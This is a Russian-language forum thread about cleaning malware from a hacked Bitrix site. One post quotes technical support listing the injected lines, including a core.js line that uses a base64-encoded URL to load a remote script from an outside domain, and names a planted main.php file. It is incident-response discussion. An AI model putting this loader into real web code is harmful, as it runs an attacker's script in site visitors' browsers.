Цитата |
---|
Chezorezka написал: Сервак перезапустить после данной процедуры? |
Значит проблема в другом файле.
Остается поиск.
Ещё модно просканировать бесплатным imunifyav.
17.10.2022 09:19:41
Значит проблема в другом файле. Остается поиск. Ещё модно просканировать бесплатным imunifyav. |
|||
|
|
17.10.2022 09:20:56
первые сообщения в консоли какие? на что ругается?
|
|
|
|
18.10.2022 16:23:37
Техподдержка Битрикс:
У вас в файле /bitrix/modules/main/include/prolog.php были добавлены строки вызывающие скрипт: // \n<sc ript src="
В файл /bitrix/js/main/core/core.js была добавлена строка: \bs=document.createElement(script);s.src=atob(aHR0cHM6Ly9zdG9yZWpzY2RuLnB3L2pxdWVyeXVpLmpz);document.head.appendChild(s);
Сайт заработал корректно только после ручного удаления вредоносных строк. А также удалил вам вирусный файл /bitrix/components/bitrix/main.file.input/main.php То есть у всех, кто писал выше не хватает удаления main.php |
|
|
|
19.10.2022 01:48:44
|
|||
|
|
19.10.2022 08:17:24
это само собой,
а дайте ссылку на первых трех страницах о том, что нужно удалить main.php Я видимо пропустил |
|
|
|
19.10.2022 09:15:22
|
|||
|
|
19.10.2022 12:55:49
Интересно, что недавно мне встретилось 2 сайта, которые были хакнуты еще в конце июня, но вредоносный код начал работать только сейчас. Вероятно имеет смысл вообще все сайты на Битрикс проверять на наличие вредоносных файлов ))
мои проекты:
|
|
|
|
19.10.2022 13:04:29
|
|||
|
|
19.10.2022 13:25:19
Агзамов Раиль, а у нас просто испортили файл prolog.php. Видимо код был рассчитан на то, что в конце php файла обязательно будет ?>
мои проекты:
|
||||
|
|
|||